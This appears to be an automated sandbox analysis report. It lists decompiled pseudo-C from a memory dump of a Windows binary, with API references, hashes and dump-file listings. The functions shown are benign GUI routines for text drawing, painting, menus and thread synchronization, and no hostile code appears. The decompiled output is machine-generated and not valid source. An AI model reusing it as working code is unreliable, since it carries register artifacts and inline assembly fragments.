Opcode Fuzzy Hash: b7d6ec1451abac277d570761dfb0fe26c4282e162535dcda5698a1e1f187b957
Instruction Fuzzy Hash: CD5120B5A00509BBD710DAA5CD82FEFB7BCAF08304F005126BA05E7681DB74E954CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 00449058, Relevance: 7.7, APIs: 5, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00449058(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v16;
				struct tagRECT _v32;
				void* _t53;
				int _t63;
				CHAR* _t65;
				void* _t76;
				void* _t78;
				int _t89;
				CHAR* _t91;
				int _t117;
				intOrPtr _t127;
				void* _t139;
				void* _t144;
				char _t153;

				_t120 = __ecx;
				_t143 = _t144;
				_v16 = 0;
				_v12 = __ecx;
				_v8 = __edx;
				_t139 = __eax;
				_t117 = _a4;
				_push(_t144);
				_push(0x44923c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t144 + 0xffffffe4;
				_t53 = E0044AEBC(__eax);
				_t135 = _t53;
				if(_t53 != 0 && E0044C4F8(_t135) != 0) {
					if((_t117 & 0x00000000) != 0) {
						__eflags = (_t117 & 0x00000002) - 2;
						if((_t117 & 0x00000002) == 2) {
							_t117 = _t117 & 0xfffffffd;
							__eflags = _t117;
						}
					} else {
						_t117 = _t117 & 0xffffffff | 0x00000002;
					}
					_t117 = _t117 | 0x00020000;
				}
				E004043B8( &_v16, _v12);
				if((_t117 & 0x00000004) == 0) {
					L12:
					E0040471C(_v16, 0x449260);
					if(_t153 != 0) {
						E0041F8D4( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
						__eflags =  *((char*)(_t139 + 0x3a));
						if( *((char*)(_t139 + 0x3a)) != 0) {
							_t136 =  *((intOrPtr*)(_v8 + 0xc));
							__eflags = E0041F28C( *((intOrPtr*)(_v8 + 0xc))) |  *0x449264;
							E0041F298( *((intOrPtr*)(_v8 + 0xc)), E0041F28C( *((intOrPtr*)(_v8 + 0xc))) |  *0x449264, _t136, _t139, _t143);
						}
						__eflags =  *((char*)(_t139 + 0x39));
						if( *((char*)(_t139 + 0x39)) != 0) {
							L24:
							_t63 = E004045D8(_v16);
							_t65 = E004047D0(_v16);
							DrawTextA(E00420244(_v8), _t65, _t63, _a12, _t117);
							L25:
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x449243);
							return E00404320( &_v16);
						} else {
							__eflags = _a8;
							if(_a8 == 0) {
								OffsetRect(_a12, 1, 1);
								E0041EFCC( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
								_t89 = E004045D8(_v16);
								_t91 = E004047D0(_v16);
								DrawTextA(E00420244(_v8), _t91, _t89, _a12, _t117);
								OffsetRect(_a12, 0xffffffff, 0xffffffff);
							}
							__eflags = _a8;
							if(_a8 == 0) {
								L23:
								E0041EFCC( *((intOrPtr*)(_v8 + 0xc)), 0x80000010);
							} else {
								_t76 = E0041EB0C(0x8000000d);
								_t78 = E0041EB0C(0x80000010);
								__eflags = _t76 - _t78;
								if(_t76 != _t78) {
									goto L23;
								}
								E0041EFCC( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
							}
							goto L24;
						}
					}
					if((_t117 & 0x00000004) == 0) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v32.top = _v32.top + 4;
						DrawEdge(E00420244(_v8),  &_v32, 6, 2);
					}
					goto L25;
				} else {
					if(_v16 == 0) {
						L11:
						E004045E0( &_v16, 0x449254);
						goto L12;
					}
					if( *_v16 != 0x26) {
						goto L12;
					}
					_t153 =  *((char*)(_v16 + 1));
					if(_t153 != 0) {
						goto L12;
					}
					goto L11;
				}
			}

0x00449058
0x00449059
0x00449063
0x00449066
0x00449069
0x0044906c
0x0044906e
0x00449073
0x00449074
0x00449079
0x0044907c
0x00449081
0x00449086
0x0044908a
0x0044909a
0x004490a9
0x004490ac
0x004490b1
0x004490b1
0x004490b1
0x0044909c
0x0044909f
0x0044909f
0x004490b4
0x004490b4
0x004490c0
0x004490c8
0x004490ee
0x004490f6
0x004490fb
0x00449139
0x0044913e
0x00449142
0x00449147
0x00449153
0x0044915b
0x0044915b
0x00449160
0x00449164
0x00449201
0x00449209
0x00449212
0x00449221
0x00449226
0x00449228
0x0044922b
0x0044922e
0x0044923b
0x0044916a
0x0044916a
0x0044916e
0x00449178
0x00449188
0x00449195
0x0044919e
0x004491ad
0x004491ba
0x004491ba
0x004491bf
0x004491c3
0x004491f1
0x004491fc
0x004491c5
0x004491ca
0x004491d6
0x004491db
0x004491dd
0x00000000
0x00000000
0x004491ea
0x004491ea
0x00000000
0x004491c3
0x00449164
0x00449100
0x0044910e
0x0044910f
0x00449110
0x00449111
0x00449112
0x00449127
0x00449127
0x00000000
0x004490ca
0x004490ce
0x004490e1
0x004490e9
0x00000000
0x004490e9
0x004490d6
0x00000000
0x00000000
0x004490db
0x004490df
0x00000000
0x00000000
0x00000000
0x004490df

APIs

DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00449127
OffsetRect.USER32(?,00000001,00000001), ref: 00449178
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 004491AD
OffsetRect.USER32(?,000000FF,000000FF), ref: 004491BA
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00449221

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Draw$OffsetRectText$Edge
String ID:
API String ID: 3610532707-0
Opcode ID: 7bc41e932a2a0dc8eff16413343ed9810a5e00d9927b86b0125edd31ef4db6ba
Instruction ID: 0315fe29241311e4b7b4390945ba64807feb0dbb905db5fae7eb725f17219ade
Opcode Fuzzy Hash: 7bc41e932a2a0dc8eff16413343ed9810a5e00d9927b86b0125edd31ef4db6ba
Instruction Fuzzy Hash: 8E518370A04209AFEB10EBA9C885B9FB7E5AF45314F1481ABFD10E7392C77CAD409719

Uniqueness

Uniqueness Score: -1.00%

Function 0042AEC4, Relevance: 7.6, APIs: 5, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0042AEC4(intOrPtr* __eax, void* __ebx, signed int __ecx, struct tagRECT* __edx, void* __edi, void* __esi) {
				char _v8;
				int _t40;
				CHAR* _t42;
				int _t54;
				CHAR* _t56;
				int _t65;
				CHAR* _t67;
				intOrPtr* _t76;
				intOrPtr _t86;
				struct tagRECT* _t91;
				signed int _t93;
				int _t94;
				intOrPtr _t97;
				signed int _t104;

				_push(0);
				_t93 = __ecx;
				_t91 = __edx;
				_t76 = __eax;
				_push(_t97);
				_push(0x42b01a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t97;
				 *((intOrPtr*)( *__eax + 0x90))();
				if((__ecx & 0x00000400) != 0 && (_v8 == 0 ||  *((char*)(__eax + 0x170)) != 0 &&  *_v8 == 0x26 &&  *((char*)(_v8 + 1)) == 0)) {
					E004045E0( &_v8, 0x42b030);
				}
				if( *((char*)(_t76 + 0x170)) == 0) {
					_t104 = _t93;
				}
				_t94 = E0043AFD4(_t76, _t93, _t104);
				E00420140( *((intOrPtr*)(_t76 + 0x160)));
				if( *((intOrPtr*)( *_t76 + 0x50))() != 0) {
					_t40 = E004045D8(_v8);
					_t42 = E004047D0(_v8);
					DrawTextA(E00420244( *((intOrPtr*)(_t76 + 0x160))), _t42, _t40, _t91, _t94);
				} else {
					OffsetRect(_t91, 1, 1);
					E0041EFCC( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000014);
					_t54 = E004045D8(_v8);
					_t56 = E004047D0(_v8);
					DrawTextA(E00420244( *((intOrPtr*)(_t76 + 0x160))), _t56, _t54, _t91, _t94);
					OffsetRect(_t91, 0xffffffff, 0xffffffff);
					E0041EFCC( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000010);
					_t65 = E004045D8(_v8);
					_t67 = E004047D0(_v8);
					DrawTextA(E00420244( *((intOrPtr*)(_t76 + 0x160))), _t67, _t65, _t91, _t94);
				}
				_pop(_t86);
				 *[fs:eax] = _t86;
				_push(0x42b021);
				return E00404320( &_v8);
			}

0x0042aec7
0x0042aecc
0x0042aece
0x0042aed0
0x0042aed4
0x0042aed5
0x0042aeda
0x0042aedd
0x0042aee7
0x0042aef3
0x0042af1d
0x0042af1d
0x0042af29
0x0042af2b
0x0042af2b
0x0042af3a
0x0042af45
0x0042af53
0x0042afe4
0x0042afed
0x0042afff
0x0042af59
0x0042af5e
0x0042af71
0x0042af7b
0x0042af84
0x0042af96
0x0042afa0
0x0042afb3
0x0042afbd
0x0042afc6
0x0042afd8
0x0042afd8
0x0042b006
0x0042b009
0x0042b00c
0x0042b019

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 0042AF5E
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042AF96
OffsetRect.USER32(?,000000FF,000000FF), ref: 0042AFA0
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042AFD8
DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042AFFF

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawText$OffsetRect
String ID:
API String ID: 1886049697-0
Opcode ID: 1b216df02a533e744f27e749048df342cc6bb4e73506a8c15d6ed567fa9d56b9
Instruction ID: 7a5556691b9469cd6711c44107b66f3bf77f825cfa8b35f220917139b22661ea
Opcode Fuzzy Hash: 1b216df02a533e744f27e749048df342cc6bb4e73506a8c15d6ed567fa9d56b9
Instruction Fuzzy Hash: 45318270704114AFDB11EB6ADC85F8BB7E8AF45318F5540BBB808EB292CB7C9D109769

Uniqueness

Uniqueness Score: -1.00%

Function 0043D0C0, Relevance: 7.6, APIs: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0043D0C0(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E0043F370(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x43d1e0);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E004140D0( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E0043D21C(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x43d1e7);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E0043F370(_v8),  &_v84);
				}
				return _t55;
			}

0x0043d0c1
0x0043d0c3
0x0043d0c9
0x0043d0cc
0x0043d0d2
0x0043d0d7
0x0043d0eb
0x0043d0eb
0x0043d0ef
0x0043d0f0
0x0043d0f5
0x0043d0f8
0x0043d105
0x0043d11f
0x0043d122
0x0043d135
0x0043d138
0x0043d13a
0x0043d13b
0x0043d13d
0x0043d148
0x0043d151
0x0043d163
0x00000000
0x0043d165
0x0043d181
0x0043d188
0x00000000
0x00000000
0x0043d188
0x00000000
0x00000000
0x00000000
0x00000000
0x0043d18a
0x0043d18a
0x0043d18b
0x0043d18b
0x0043d13d
0x0043d18e
0x0043d192
0x0043d19b
0x0043d19b
0x0043d1a6
0x0043d107
0x0043d10e
0x0043d10e
0x0043d1b2
0x0043d1b9
0x0043d1bc
0x0043d1bf
0x0043d1c4
0x0043d1cb
0x00000000
0x0043d1da
0x0043d1df

APIs

BeginPaint.USER32(00000000,?), ref: 0043D0E6
SaveDC.GDI32(?), ref: 0043D11A
ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043D17C
RestoreDC.GDI32(?,?), ref: 0043D1A6
EndPaint.USER32(00000000,?,0043D1E7), ref: 0043D1DA

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: f2f0eee0f97ab0e62457cc266fb7d31b60c357ee18698738b628449a29af5b0f
Instruction ID: 3135e43bd7cc1ec86384c1f1433b6b455f76895a2ee8dd3dc83cca89d9da0087
Opcode Fuzzy Hash: f2f0eee0f97ab0e62457cc266fb7d31b60c357ee18698738b628449a29af5b0f
Instruction Fuzzy Hash: 29415D70E00204AFCB10DF99D885FAEB7F9EF48318F1590AAE5049B362D739AD45CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0041BC00, Relevance: 7.6, APIs: 5, Instructions: 89
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0041BC00() {
				char _v5;
				intOrPtr* _v12;
				char _v16;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t16;
				char _t19;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t24;
				intOrPtr _t34;
				void* _t39;
				intOrPtr _t46;
				intOrPtr* _t47;
				intOrPtr _t48;
				intOrPtr _t51;
				void* _t53;
				void* _t55;
				void* _t58;
				void* _t60;
				intOrPtr _t61;

				_t58 = _t60;
				_t61 = _t60 + 0xfffffff0;
				_push(_t39);
				_push(_t55);
				_push(_t53);
				_t16 = GetCurrentThreadId();
				_t47 =  *0x48e858; // 0x48f030
				if(_t16 !=  *_t47) {
					_v20 = GetCurrentThreadId();
					_v16 = 0;
					_t46 =  *0x48e6e8; // 0x4103d8
					E0040A1E0(_t39, _t46, 1, _t53, _t55, 0,  &_v20);
					E00403D80();
				}
				if( *0x48fa00 == 0) {
					_v5 = 0;
					return _v5;
				} else {
					_push(0x48fa04);
					L00406840();
					_push(_t58);
					_push(0x41bd16);
					_push( *[fs:eax]);
					 *[fs:eax] = _t61;
					if( *0x4714b8 == 0) {
						L5:
						_t19 = 0;
					} else {
						_t34 =  *0x4714b8; // 0x0
						if( *((intOrPtr*)(_t34 + 8)) > 0) {
							_t19 = 1;
						} else {
							goto L5;
						}
					}
					_v5 = _t19;
					if(_v5 != 0) {
						while(1) {
							_t21 =  *0x4714b8; // 0x0
							if( *((intOrPtr*)(_t21 + 8)) <= 0) {
								break;
							}
							_t22 =  *0x4714b8; // 0x0
							_v12 = E004140D0(_t22, 0);
							_t24 =  *0x4714b8; // 0x0
							E00413FC0(_t24, 0);
							 *[fs:eax] = _t61;
							 *((intOrPtr*)( *_v12 + 0x20))( *[fs:eax], 0x41bcc9, _t58);
							_pop(_t51);
							 *[fs:eax] = _t51;
							SetEvent( *(_v12 + 4));
						}
						 *0x48fa00 = 0;
					}
					_pop(_t48);
					 *[fs:eax] = _t48;
					_push(E0041BD21);
					_push(0x48fa04);
					L00406990();
					return 0;
				}
			}

0x0041bc01
0x0041bc03
0x0041bc06
0x0041bc07
0x0041bc08
0x0041bc09
0x0041bc0e
0x0041bc16
0x0041bc1d
0x0041bc20
0x0041bc2a
0x0041bc37
0x0041bc3c
0x0041bc3c
0x0041bc48
0x0041bd1d
0x0041bd2a
0x0041bc4e
0x0041bc4e
0x0041bc53
0x0041bc5a
0x0041bc5b
0x0041bc60
0x0041bc63
0x0041bc6d
0x0041bc7a
0x0041bc7a
0x0041bc6f
0x0041bc6f
0x0041bc78
0x0041bc7e
0x00000000
0x00000000
0x00000000
0x0041bc78
0x0041bc80
0x0041bc87
0x0041bcec
0x0041bcec
0x0041bcf5
0x00000000
0x00000000
0x0041bc8d
0x0041bc97
0x0041bc9c
0x0041bca1
0x0041bcb1
0x0041bcbc
0x0041bcc1
0x0041bcc4
0x0041bce7
0x0041bce7
0x0041bcf7
0x0041bcf7
0x0041bd00
0x0041bd03
0x0041bd06
0x0041bd0b
0x0041bd10
0x0041bd15
0x0041bd15

APIs

GetCurrentThreadId.KERNEL32 ref: 0041BC09
GetCurrentThreadId.KERNEL32 ref: 0041BC18
RtlEnterCriticalSection.KERNEL32(0048FA04,?,?,00000000), ref: 0041BC53
SetEvent.KERNEL32(?,?,0048FA04,?,?,00000000), ref: 0041BCE7
RtlLeaveCriticalSection.KERNEL32(0048FA04,0041BD21,0048FA04,?,?,00000000), ref: 0041BD10

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalCurrentSectionThread$EnterEventLeave
String ID:
API String ID: 130076905-0
Opcode ID: e270eee21ea3552e09c9b7b7e307c2fa1c69c077b17729c4e4947cdfa5301778
Instruction ID: 4987ef042376d355f65bd83c15d1d7c11e0dbfb86faa406ef20a701e8048415b
Opcode Fuzzy Hash: e270eee21ea3552e09c9b7b7e307c2fa1c69c077b17729c4e4947cdfa5301778
Instruction Fuzzy Hash: 7F310430604244DFE311EB69DC82B9E7BE8EB49314F5584BEE805977A1DB3C5885CBE8

Uniqueness

Uniqueness Score: -1.00%

Function 0046A7C4, Relevance: 7.6, APIs: 5, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0046A7C4(void* __ecx, void* __edx, void* __eflags, signed int _a4, char _a8, void* _a12) {
				struct tagRECT _v20;
				void* __edi;
				void* __ebp;
				int _t17;
				CHAR* _t19;
				int _t31;
				CHAR* _t33;
				int _t43;
				CHAR* _t45;
				void* _t49;
				signed int _t56;
				int _t57;
				void* _t61;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t60 = __ecx;
				_t49 = __edx;
				_t56 = _a4;
				E0041F8D4( *((intOrPtr*)(__edx + 0x14)), __ecx, 1, _t56, _t61, __eflags);
				if(_a8 != 1) {
					_t57 = _t56 | 0x00000005;
					__eflags = _t57;
					_t17 = E004045D8(__ecx);
					_t19 = E004047D0(__ecx);
					return DrawTextA(E00420244(_t49), _t19, _t17,  &_v20, _t57);
				}
				OffsetRect( &_v20, 1, 1);
				E0041EFCC( *((intOrPtr*)(_t49 + 0xc)), 0x80000014);
				_t31 = E004045D8(_t60);
				_t33 = E004047D0(_t60);
				DrawTextA(E00420244(_t49), _t33, _t31,  &_v20, _t56 | 0x00000005);
				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
				E0041EFCC( *((intOrPtr*)(_t49 + 0xc)), 0x80000010);
				_t43 = E004045D8(_t60);
				_t45 = E004047D0(_t60);
				return DrawTextA(E00420244(_t49), _t45, _t43,  &_v20, _t56 | 0x00000005);
			}

0x0046a7d3
0x0046a7d4
0x0046a7d5
0x0046a7d6
0x0046a7d7
0x0046a7d9
0x0046a7db
0x0046a7e3
0x0046a7ec
0x0046a874
0x0046a874
0x0046a87e
0x0046a886
0x00000000
0x0046a894
0x0046a7fa
0x0046a807
0x0046a818
0x0046a820
0x0046a82e
0x0046a83b
0x0046a848
0x0046a857
0x0046a85f
0x00000000

APIs

OffsetRect.USER32(?,00000001,00000001), ref: 0046A7FA
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0046A82E
OffsetRect.USER32(?,000000FF,000000FF), ref: 0046A83B
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0046A86D
DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 0046A894

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID: DrawText$OffsetRect
String ID:
API String ID: 1886049697-0
Opcode ID: bdba36bdd338d71531e73a1986283dc74329c030fc1e85f075fabb976377156e
Instruction ID: 28bc9e4762f99f59362df802305d2fb5610095d317cc4f66a77b0e2bf3a65580
Opcode Fuzzy Hash: bdba36bdd338d71531e73a1986283dc74329c030fc1e85f075fabb976377156e
Instruction Fuzzy Hash: F521A4B170051567CB00FA6E9C45E9F72AC5F45318F10063FB918F7282EA7DE911476D

Uniqueness

Uniqueness Score: -1.00%

Function 00448E98, Relevance: 7.6, APIs: 5, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00448E98(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E00448E98(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E00448FC8(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E00448FC8(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E00448FC8(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E00448D64(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x4479b8; // 0x447a04
						if(E00403740( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E00448FC8(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}

0x00448e98
0x00448e9c
0x00448ea2
0x00448eac
0x00448eae
0x00000000
0x00448eae
0x00448eb7
0x00448ebc
0x00000000
0x00448ebe
0x00448ed0
0x00448ed5
0x00448ed9
0x00448ede
0x00448ee7
0x00448ef1
0x00448ef8
0x00448f08
0x00448f0d
0x00448f0d
0x00448f0f
0x00448f10
0x00448f16
0x00448f1c
0x00448f51
0x00448f53
0x00448f58
0x00000000
0x00448f5e
0x00448f21
0x00448f2e
0x00000000
0x00448f41
0x00448f45
0x00448f4c
0x00000000
0x00448f4c
0x00448f2e
0x00448f16
0x00448f65

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234123968.000000000048F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234129076.0000000000495000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f3d75ef201c72181aead25349ed9e64195085900d22fe07201b57564b5e4374
Instruction ID: 307f6af9cd1b0d590384dd5b18a26c328ad7071897b1c15ffb15a35cf8c7eed3
Opcode Fuzzy Hash: 5f3d75ef201c72181aead25349ed9e64195085900d22fe07201b57564b5e4374
Instruction Fuzzy Hash: 1911B1217053185AFB60AA3A8905B5F268A9F6170DF44042FBD05EB3C3CE3CDC4A829C

Uniqueness

Uniqueness Score: -1.00%

Function 00458888, Relevance: 7.6, APIs: 5, Instructions: 73
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00458888(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x48f714 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x0
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E00435BD0(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E0043F370(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}

0x00458888
0x0045888c
0x0045888e
0x00458890
0x00458892
0x0045889a
0x00458939
0x0045893f
0x004588ab
0x004588b0
0x004588b4
0x0045891a
0x00458937
0x00458937
0x00000000
0x0045891a
0x004588b6
0x004588b8
0x004588b8
0x004588bd
0x004588d8
0x004588e1
0x004588d6
0x00000000
0x004588d6
0x004588e9
0x004588eb
0x004588eb
0x00000000
0x004588c7
0x004588cc
0x004588ed
0x00458906
0x00458908
0x00458908
0x00000000
0x00458906
0x004588bd

APIs

GetCapture.USER32 ref: 004588AB
SendMessageA.USER32 ref: 004588FF
GetWindowLongA.USER32 ref: 0045890F
SendMessageA.USER32 ref: 0045892E

Memory Dump Source

Source File: 00000000.00000002.234059191.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.234054357.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.234107798.0000000000471000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.234112555.0000000000472000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.234119396.000000000048E000.00000008.00020000.sdmp Download File
